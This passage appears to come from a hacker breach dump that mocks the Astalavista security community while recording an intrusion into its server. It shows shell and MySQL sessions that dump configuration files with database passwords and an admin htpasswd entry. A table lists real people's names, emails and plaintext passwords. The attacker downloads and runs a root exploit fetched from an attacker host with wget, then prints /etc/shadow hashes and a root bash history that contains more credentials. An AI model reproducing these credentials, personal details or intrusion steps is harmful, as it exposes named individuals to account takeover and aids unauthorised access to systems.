  700. | system | 0defe9e458e745625fffbc215d7801c5 | info@comvation.com |
  701. | prozac | 1f65f06d9758599e9ad27cf9707f92b5 | prozac@astalavista.com |
  702. | Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | paulo.santos@astalavista.ch |
  703. | schmid | 0defe9e458e745625fffbc215d7801c5 | ivan.schmid@comvation.com |
  704. +------------+----------------------------------+-----------------------------+
  705. 4 rows in set (0.04 sec)
  706.  
  707. mysql> exit;
  708. Bye
  709.  
  710. [~] There you go, your "team of security and IT professionals" is a joke.
  711.  
  712. +------------------------------+
  713. system:f82BN3+_*
  714. Be1er0ph0r:belerophor4astacom
  715. prozac:asta4cms!
  716. commander:mpbdaagf6m
  717. sykadul:ak29eral
  718. +------------------------------+
  719.  
  720. [~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
  721. ...and the others, find another area to get paid from, security isn't for sale and you obviously fail at it.
  722.  
  723. [~] Lets move to astalavista.net now,
  724.  
  725. From <https://www.astalavista.net/>:
  726. >> Everyone knows that the best defense is a good offense.
  727. >> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
  728. >> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
  729. >> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking."
  730.  
  731. >> Go ahead, try and hack our server . in a completely legal way!
  732. >> Learn by doing: We offer our members tricky tasks and challenges on an
  733. >> ongoing basis so you can test your knowledge and abilities. You can also
  734. >> demonstrate what you.ve mastered by taking part in regular hacker contests
  735. >> and war games
  736.  
  737. [~] Lets take a look there, after all... they are hack-proof, aren't they?!
  738.  
  739. [-] Tricky task: Find home dir of astalavista.net
  740.  
  741. sh-3.2$ ls -la ~astanet
  742. total 48
  743. drwx--x--x 6 astanet astanet 4096 Dec 23 15:55 .
  744. drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
  745. drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
  746. -rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
  747. -rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout
  748. -rw-r--r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile
  749. -rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc
  750. drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains
  751. drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap
  752. drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail
  753. lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
  754. -rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow
  755.  
  756. sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
  757. sh-3.2$ ls -la
  758. total 200
  759. drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .
  760. drwx--x--x 8 astanet astanet 4096 Dec 23 13:53 ..
  761. drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
  762. drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
  763. drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 astanet@astalavista.com
  764. drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
  765. drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
  766. -rw-r--r-- 1 astanet astanet 25724 Apr 4 2006 banner.jpg
  767. drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
  768. drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
  769. drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
  770. -rw-r--r-- 1 astanet astanet 36 Jan 5 2006 error.php
  771. -rw-r--r-- 1 astanet astanet 1406 Jan 5 2006 favicon.ico
  772. drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
  773. drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
  774. -rw-r--r-- 1 astanet astanet 18 Jan 5 2006 htaccess
  775. -rw-r--r-- 1 astanet astanet 585 Mar 24 14:50 .htaccess
  776. -rw-r--r-- 1 astanet astanet 398 Jan 5 2006 index1.php
  777. -rw-r--r-- 1 astanet astanet 1036 Jan 5 2006 _index.html
  778. -rw-r--r-- 1 astanet astanet 6880 Dec 23 14:44 index.php
  779. -rw-r--r-- 1 astanet astanet 676 Mar 21 2006 index_redirect.php
  780. -rw-r--r-- 1 astanet astanet 739 Feb 24 2006 index.swf
  781. drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
  782. drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
  783. drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
  784. drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
  785. drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
  786. drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
  787. drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
  788. -rw-r--r-- 1 astanet astanet 7219 Feb 24 2006 pix1.swf
  789. drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
  790. -rw-r--r-- 1 astanet astanet 23 Jan 5 2006 robots.txt
  791. drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
  792. drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
  793. drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
  794. drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
  795. drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
  796. drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
  797. drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
  798. drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
  799. -rw-r--r-- 1 astanet astanet 35 Dec 4 2006 webcash.php
  800. drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
  801.  
  802. sh-3.2$ head -20 index.php
  803. <?PHP
  804. /**
  805. * Mainfile (external) for astalavistaNET v2.0
  806. *
  807. * @copyright Astalavista IT Engineering GmbH
  808. * @author Thomas Kaelin <thomas.kaelin@astalavista.ch>
  809. * @version 1.0
  810. */
  811.  
  812. if ($_SERVER['PHP_SELF'] == '/webcash.php') {
  813. $dontStartSession = false;
  814. } else {
  815. $dontStartSession = true;
  816. }
  817. require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');
  818. require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');
  819. require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.class.php');
  820. require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.class.php');
  821.  
  822. sh-3.2$ cd config
  823. sh-3.2$ ls -la
  824. total 32
  825. drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
  826. drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
  827. -rw-r--r-- 1 astanet astanet 987 Aug 11 2006 adm.conf.php
  828. -rw-r--r-- 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
  829. -rw-r--r-- 1 astanet astanet 913 Aug 11 2006 cron.conf.php
  830. -rw-r--r-- 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
  831. -rw-r--r-- 1 astanet astanet 2724 May 30 2007 int.conf.php
  832.  
  833. sh-3.2$ cat com.conf.php
  834. [snip]
  835. //member-database
  836. $_CONFIG['db_mem_server'] = 'localhost';
  837. $_CONFIG['db_mem_database'] = 'astanet_membersystem';
  838. $_CONFIG['db_mem_user'] = 'astanet_db';
  839. $_CONFIG['db_mem_password'] = 'TXwVrC7hbq';
  840. $_CONFIG['db_mem_debug'] = false; //true or false
  841. //ads-database
  842. $_CONFIG['db_ads_server'] = 'localhost';
  843. $_CONFIG['db_ads_database'] = 'astanet_ads';
  844. $_CONFIG['db_ads_user'] = 'astanet_db';
  845. $_CONFIG['db_ads_password'] = 'TXwVrC7hbq';
  846. $_CONFIG['db_ads_debug'] = false; //true or false
  847. //rainbow-database
  848. $_CONFIG['db_rainbow_server'] = '212.254.194.163';
  849. $_CONFIG['db_rainbow_database'] = 'rainbow';
  850. $_CONFIG['db_rainbow_user'] = 'dinu';
  851. $_CONFIG['db_rainbow_password'] = 'dinudinu';
  852. $_CONFIG['db_rainbow_debug'] = false; //true or false
  853. //mailing lists database
  854. $_CONFIG['db_mailing_lists_server'] = 'localhost';
  855. $_CONFIG['db_mailing_lists_database'] = 'astanet_mailing_lists';
  856. $_CONFIG['db_mailing_lists_user'] = 'astanet_db';
  857. $_CONFIG['db_mailing_lists_password'] = 'TXwVrC7hbq';
  858. $_CONFIG['db_mailing_lists_debug'] = false; //true or false
  859. //paypal
  860. $_CONFIG['sub_pp_url'] = 'https://www.paypal.com/cgi-bin/webscr';
  861. $_CONFIG['sub_pp_cmd'] = '_xclick';
  862. $_CONFIG['sub_pp_business'] = 'info@astalavista.net';
  863. $_CONFIG['sub_pp_noship'] = '1';
  864. $_CONFIG['sub_pp_referer'] = 'https://www.paypal.com/';
  865. [snip]
  866.  
  867. sh-3.2$ cd ..
  868. sh-3.2$ cd member
  869. sh-3.2$ ls -la
  870. total 20
  871. drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
  872. drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
  873. -rw-r--r-- 1 astanet astanet 19 Jan 13 14:02 .htaccess
  874. -rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
  875. sh-3.2$ cat .htaccess
  876. SecFilterEngine off
  877.  
  878. sh-3.2$ cd ..
  879. sh-3.2$ cd cron
  880. sh-3.2$ ls -la
  881. total 168
  882. drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
  883. drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
  884. -rw-r--r-- 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
  885. -rw-r--r-- 1 astanet astanet 2356 Aug 11 2006 0_functions.php
  886. -rw-r--r-- 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
  887. -rw-r--r-- 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
  888. -rw-r--r-- 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
  889. -rw-r--r-- 1 astanet astanet 432 Aug 11 2006 1_weekly.php
  890. -rw-r--r-- 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
  891. -rw-r--r-- 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
  892. -rw-r--r-- 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
  893. -rw-r--r-- 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
  894. -rw-r--r-- 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
  895. -rw-r--r-- 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
  896. -rw-r--r-- 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
  897. -rw-r--r-- 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
  898. -rw-r--r-- 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
  899. -rw-r--r-- 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
  900. -rw-r--r-- 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
  901. -rw-r--r-- 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
  902. drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
  903. -rw-r--r-- 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
  904. -rw-r--r-- 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
  905.  
  906. sh-3.2$ cd ..
  907. sh-3.2$ cd _007
  908. sh-3.2$ ls -la
  909. total 24
  910. drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
  911. drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
  912. -rw-r--r-- 1 astanet astanet 96 Dec 23 15:17 .htaccess
  913. -rw-r--r-- 1 astanet astanet 3263 Jan 15 2007 index.php
  914. -rw-r--r-- 1 astanet astanet 20 Dec 27 2006 info.php
  915. drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
  916.  
  917. sh-3.2$ cat .htaccess
  918. authType Basic
  919. authName Admin
  920. authUserFile /home/astanet/auth/.htadm_pwd
  921. require valid-user
  922.  
  923. sh-3.2$ cat /home/astanet/auth/.htadm_pwd
  924. admin2net:CR0bl65MwhfT
  925.  
  926. sh-3.2$ mysql -u astanet_db -p
  927. Enter password:
  928. Welcome to the MySQL monitor. Commands end with ; or \g.
  929. Your MySQL connection id is 275153
  930. Server version: 5.0.45-community-log MySQL Community Edition (GPL)
  931.  
  932. Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
  933.  
  934. mysql> show databases;
  935. +-----------------------+
  936. | Database |
  937. +-----------------------+
  938. | information_schema |
  939. | astanet_ads |
  940. | astanet_mailing_lists |
  941. | astanet_mediawiki |
  942. | astanet_membersystem |
  943. | test |
  944. +-----------------------+
  945. 6 rows in set (0.00 sec)
  946.  
  947. mysql> use astanet_membersystem
  948. Database changed
  949. mysql> show tables;
  950. +-----------------------------------+
  951. | Tables_in_astanet_membersystem |
  952. +-----------------------------------+
  953. | blacklist_categories |
  954. | blacklist_content |
  955. | blacklist_levels |
  956. | blacklist_mcset |
  957. | dir_categories |
  958. | dir_comments |
  959. | dir_links |
  960. | dir_temp |
  961. | dir_votes |
  962. | documents |
  963. | documents_categories |
  964. | email_content |
  965. | email_settings |
  966. | exploits |
  967. | exploits_categories |
  968. | exploittree_categories |
  969. | exploittree_exploits |
  970. | home_values |
  971. | iso_countries |
  972. | links_categories |
  973. | links_records |
  974. | links_unauth |
  975. | links_votes |
  976. | log |
  977. | news_categories |
  978. | news_comments |
  979. | news_emoticons |
  980. | news_latest |
  981. | news_messages |
  982. | news_statistics |
  983. | news_votes |
  984. | prices_content |
  985. | prices_offers |
  986. | rss_settings |
  987. | sessions |
  988. | stats_signups |
  989. | u2u2 |
  990. | u2u_contact |
  991. | u2u_settings |
  992. | user_keywords_selected_categories |
  993. | users |
  994. | users_ipn_test |
  995. | users_keyword_values |
  996. | users_profile |
  997. | users_temp |
  998. | users_upgrade |
  999. +-----------------------------------+
  1000. 46 rows in set (0.00 sec)
  1001.  
  1002. mysql> describe users;
  1003. +--------------------------+--------------------------------------+------+-----+---------------------+----------------+
  1004. | Field | Type | Null | Key | Default | Extra |
  1005. +--------------------------+--------------------------------------+------+-----+---------------------+----------------+
  1006. | primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
  1007. | user | varchar(50) | NO | | | |
  1008. | nickname | varchar(30) | NO | MUL | anonymous | |
  1009. | password | varchar(30) | NO | | | |
  1010. | userlevel | tinyint(3) | YES | MUL | NULL | |
  1011. | exp | int(8) unsigned | NO | | 0 | |
  1012. | email | varchar(50) | NO | | | |
  1013. | ip | varchar(15) | NO | | 0 | |
  1014. | proxy | set('0','1') | NO | | 0 | |
  1015. | logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
  1016. | login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
  1017. | anz_in | tinyint(1) | NO | | -1 | |
  1018. | status | tinyint(1) unsigned | NO | | 0 | |
  1019. | checked | set('0','1','2') | NO | | 0 | |
  1020. | freemember | set('0','1') | NO | | 0 | |
  1021. | ordertype | set('transfer','wp','pp','mc','CnB') | YES | | NULL | |
  1022. | lang | tinytext | NO | | | |
  1023. | adid | smallint(6) | NO | | 0 | |
  1024. | pp_txn_id | varchar(255) | YES | | NULL | |
  1025. | cnb_transaction_id | varchar(255) | YES | | NULL | |
  1026. | cnb_order_id | varchar(255) | YES | | NULL | |
  1027. | cnb_user_id | int(11) | YES | | 0 | |
  1028. +--------------------------+--------------------------------------+------+-----+---------------------+----------------+
  1029. 22 rows in set (0.01 sec)
  1030.  
  1031. mysql> select count(*) as skids from users;
  1032. +-------+
  1033. | skids |
  1034. +-------+
  1035. | 25199 |
  1036. +-------+
  1037. 1 row in set (0.00 sec)
  1038.  
  1039. mysql> select user,nickname,password,email from users where userlevel = 1;
  1040. +--------------------------+----------------------+------------------+-----------------------------------+
  1041. | user | nickname | password | email |
  1042. +--------------------------+----------------------+------------------+-----------------------------------+
  1043. | pascal | prozac | astaman3 | info@astalavista.net |
  1044. | Ivan Schmid | rOOtless1 | astalavista4asta | ivan.schmid@comvation.com |
  1045. | qreymer | Palermo | qblsw85iam | eche@home.se |
  1046. | Christian Wehrli | g0atherd | hitt?74 | g0atherd@gmx.net |
  1047. | Andrew Blake | Minky | liq73uid | a.blake@har.mrc.ac.uk |
  1048. | Martin Wyss | dinu | kj63;cXy | martin.wyss@astalavista.net |
  1049. | Leandro Nery | Timan_no_Sanco | nery2002 | leandronery@hotmail.com |
  1050. | shaving ryans privates | ShavingRyansPrivates | memberboard313 | shavingryansprivates1@hotmail.com |
  1051. | Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | spoofedexistence@hotmail.com |
  1052. | David M Lee | Daremo | icG12m03 | daremo@hackerheaven.com |
  1053. | David Corn | akriel | ve3uB$cUku | akriel@fallenroot.net |
  1054. | Thomas Kalin | Gwanun | QwErTy123 | thomas.kaelin@astalavista.net |
  1055. | Marcus unknown | Cra58cker | hhCr4ck06 | unknownmarcus@hotmail.com |
  1056. | David Ellis | dellis203 | philip | dellis@nightwatchnss.com |
  1057. | Lars Christian Solberg | xeor | tF3s4|Nea | xeor@hush.com |
  1058. | Paulo Santos | Be1er0ph0r1 | amor01 | pmsantos@gmx.ch |
  1059. | Thomas D?ppen | daha | asta4tom | thomas.daeppen@astalavista.ch |
  1060. | Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | toraj.a.m@gmail.com |
  1061. | Fabius Bernet | traviser | wellenreiter100 | fabius.bernet@astalavista.ch |
  1062. | Zachary McElroy | duder1 | dirty245dix | mcelroyzj@yahoo.com |
  1063. | Leron Cohen | cohen2 | leron4free | leron@quiredmedia.com |
  1064. | Beatriz Pontes | anonymous1656 | pitas | joao.pedro.pontes@gmail.com |
  1065. | Glafkos Charalambous | anonymous2086 | si99490178$# | nowayout@webhostline.com |
  1066. | developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | ivan.schmid@astalavista.ch |
  1067. | Peter Fisher | cyph3r1 | testZer025435 | cyph3r@astalavista.com |
  1068. | sykadul | sykadul | ak29eral | sykadul@gmail.com |
  1069. | Ronny Janzi | commander1 | mpbdaagf6m | ronny.janzi@astalavista.ch |
  1070. +--------------------------+----------------------+------------------+-----------------------------------+
  1071. 27 rows in set (0.00 sec)
  1072.  
  1073. mysql> exit;
  1074. Bye
  1075.  
  1076. [~] plaintext passwords? yes,
  1077. Those so called "security professionals" who charge you $6.66 / month to
  1078. register at their hack-proof portal, save your passwords in plaintext...
  1079. brilliant!
  1080.  
  1081.  
  1082. [~] This been fun but we want more.
  1083.  
  1084. sh-3.2$ uname -a
  1085. Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
  1086. sh-3.2$ wget http://anti.sec.labs/g0troot
  1087. --13:33:37-- http://anti.sec.labs/g0troot
  1088. Resolving anti.sec.labs... 13.33.33.37
  1089. Connecting to anti.sec.labs|13.33.33.37|:80... connected.
  1090. HTTP request sent, awaiting response... 200 OK
  1091. Length: 18200 (18K) [text/plain]
  1092. Saving to: `g0troot'
  1093.  
  1094. 100%[=========================================================================================================================================>] 18,200 58.6K/s in
  1095. 0.3s
  1096.  
  1097. 18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]
  1098.  
  1099. sh-3.2$ ./g0troot -i x86_64
  1100. [+] g0troot - anti.sec.labs
  1101. [+] Target: 2.6.18-128.1.10.el5
  1102. [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
  1103.  
  1104. [+] r00tr00t
  1105. [~] Executing shell...
  1106.  
  1107. sh-3.2# id
  1108. uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
  1109.  
  1110. sh-3.2# cat /etc/shadow
  1111. root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
  1112. [snip]
  1113. admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
  1114. jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
  1115. com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
  1116. astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
  1117.  
  1118. sh-3.2# cat /etc/motd
  1119. #####################################################
  1120. #____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
  1121. # |__| [__ | |__| | |__| | | | [__ | |__| #
  1122. # | | ___] | | | |___ | | \/ | ___] | | | #
  1123. # #
  1124. #####################################################
  1125. # #
  1126. # Admin Contact - support@secureservertech.com #
  1127. # #
  1128. # Available ShortCuts #
  1129. # #
  1130. # nst - list active connections #
  1131. # ddos - shows how many times each ip is connected #
  1132. # ltr - restart the webserver #
  1133. # phpc - edit the php config file #
  1134. # htc - edit the webserver configuration file #
  1135. # up - uptime #
  1136. # etd - edit the motd of the day file #
  1137. # htr - start and restart apache if needed #
  1138. # syng - shows active SYN_RECV connections #
  1139. # synd - syn flood blocker - "synd -h" for usage #
  1140. #####################################################
  1141. # NOTES: #
  1142. # Last Upgrade - 12-08-2008 by JF #
  1143. # My.cnf/Mysql Optimization - 1-28-09 #
  1144. # #
  1145. # #
  1146. # #
  1147. #####################################################
  1148.  
  1149. sh-3.2# lastlog | grep -v Never
  1150. Username Port From Latest
  1151. root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
  1152. admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
  1153. com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
  1154. astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
  1155.  
  1156. sh-3.2# ls -la
  1157. total 453376
  1158. drwxr-x--- 15 root root 4096 Jun 4 08:40 .
  1159. drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
  1160. -rw-r--r-- 1 root root 2394400 Oct 19 2007 10mbtest.zip
  1161. -rw------- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
  1162. -rw------- 1 root root 16836 Jun 4 07:21 .bash_history
  1163. -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
  1164. -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
  1165. -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
  1166. -rwx------ 1 root root 1899 Oct 28 2007 bk.sh
  1167. -rw-r--r-- 1 root root 1327 Nov 29 2007 cert
  1168. -rw-r--r-- 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
  1169. drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
  1170. -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
  1171. -rw-r--r-- 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
  1172. drwx------ 2 root root 4096 Oct 28 2007 .elinks
  1173. drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
  1174. -rw-r--r-- 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
  1175. -rw------- 1 root root 0 Apr 16 13:19 .history
  1176. -rw-r--r-- 1 root root 16095 Sep 11 2007 install.log
  1177. -rw-r--r-- 1 root root 2566 Sep 11 2007 install.log.syslog
  1178. -rw-r--r-- 1 root root 1003 Jul 22 2007 install.sh
  1179. -rw------- 1 root root 35 Jun 2 14:23 .lesshst
  1180. drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
  1181. drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
  1182. -rw-r--r-- 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
  1183. -rw-r--r-- 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
  1184. -rwx------ 1 root root 760 Sep 18 2008 lp
  1185. drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
  1186. -rw-r--r-- 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
  1187. -rw-r--r-- 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
  1188. drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
  1189. -rw-r--r-- 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
  1190. drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
  1191. -rw-r--r-- 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
  1192. -rw-r--r-- 1 root root 25316 Feb 15 2006 mybk.sh
  1193. -rw------- 1 root root 41 Oct 19 2007 .my.cnf
  1194. -rw------- 1 root root 2902 Jun 4 08:40 .mysql_history
  1195. -rwx------ 1 root root 38873 Apr 16 2008 mysqlreport
  1196. -rw------- 1 root root 41 May 20 2008 .mytop
  1197. drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
  1198. -rw-r--r-- 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
  1199. drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
  1200. -rw------- 1 root root 1462 Sep 21 2007 opt.php
  1201. -rw-r--r-- 1 root root 3371 Sep 22 2007 p
  1202. -rw-r--r-- 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
  1203. -rw------- 1 root root 1024 Feb 3 21:32 .rnd
  1204. -rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
  1205. -rw-r--r-- 1 root root 887 Nov 28 2007 server.key
  1206. drwx------ 2 root root 4096 Oct 10 2008 .ssh
  1207. -rw-r--r-- 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
  1208. -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
  1209. -rw-r--r-- 1 root root 104874307 Oct 17 2007 test100.zip
  1210. -rw-r--r-- 1 root root 67085540 Oct 19 2007 test100.zip.1
  1211. drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
  1212. -rw-r--r-- 1 root root 42596 May 21 2007 tuning-primer.sh
  1213. drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
  1214. -rw-r--r-- 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
  1215. -rw------- 1 root root 12997 May 16 2008 .viminfo
  1216.  
  1217. sh-3.2# cat .bash_history
  1218. [snip]
  1219. wget cp4sst.com/sstlinux.tar.gz
  1220. tar zxvf sstlinux.tar.gz
  1221. cd linux-2.6.27.10
  1222. sh install.sh
  1223. make bzImage ; make modules ; make modules_install ; make install
  1224. make clean
  1225. service mysqld restart
  1226. [snip]
  1227. cd /usr/sbin/
  1228. chmod 4777 traceroute
  1229. chmod 4777 ping
  1230. traceroute -I www.astalavista.ch
  1231. [snip]
  1232. vi /etc/csf/csf.conf
  1233. traceroute google.ch
  1234. service csf restart
  1235. tracert google.ch
  1236. service csf restart
  1237. traceroute www.google.ch
  1238. tracert www.google.ch
  1239. traceroute www.google.ch
  1240. locate traceroute
  1241. chown 4755 /bin/traceroute
  1242. chown 4777 /bin/traceroute
  1243. locate ping
  1244. chown 4755 /bin/ping
  1245. chown 4777 /bin/ping
  1246. cd /bin/
  1247. ls -ali | grep ping
  1248. chown root ping
  1249. chmod 4755 ping
  1250. ls -ali | grep traceroute
  1251. chown root traceroute
  1252. chmod 4755 traceroute
  1253. ls -ali | grep traceroute
  1254. traceroute -I www.google.ch
  1255. traceroute www.google.ch
  1256. whois pmsantos.ch
  1257. [snip]
  1258. mysql -h com_contrexx2_live < /root/defaultp_ports.sql
  1259. mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
  1260. mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
  1261. mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
  1262. top
  1263. ping ssth.ch
  1264. ping asdlkfaljgasd???ljg???lasj.ch
  1265. ping asdlkfaljgasdlasj.ch
  1266. ping www.ssth.ch
  1267. ping ssth.ch
  1268. nslookup www.google.ch
  1269. nslookup www.ssth.ch
  1270. man nslookup
  1271. ping www.google.ch
  1272. nslookup www.google.ch
  1273. nslookup www.google.ch
  1274. nslookup salfjasdlf.ch
  1275. [snip]
  1276. openssl passwd -1 sadf
  1277. openssl passwd -1 5cZNHstdTy
  1278. mysql
  1279. mysql
  1280. locate proftp
  1281. vi /etc/proftpd.passwd
  1282. service proftpd restart
  1283. locate proftpd.conf
  1284. vi /etc/proftpd.conf
  1285. vi /etc/proftpd.passwd
  1286. service proftpd restart
  1287. [snip]
  1288. /bin/sh /home/com/backup_system/backup.sh
  1289. tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
  1290. mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
  1291. mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
  1292. ls -ali
  1293. mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
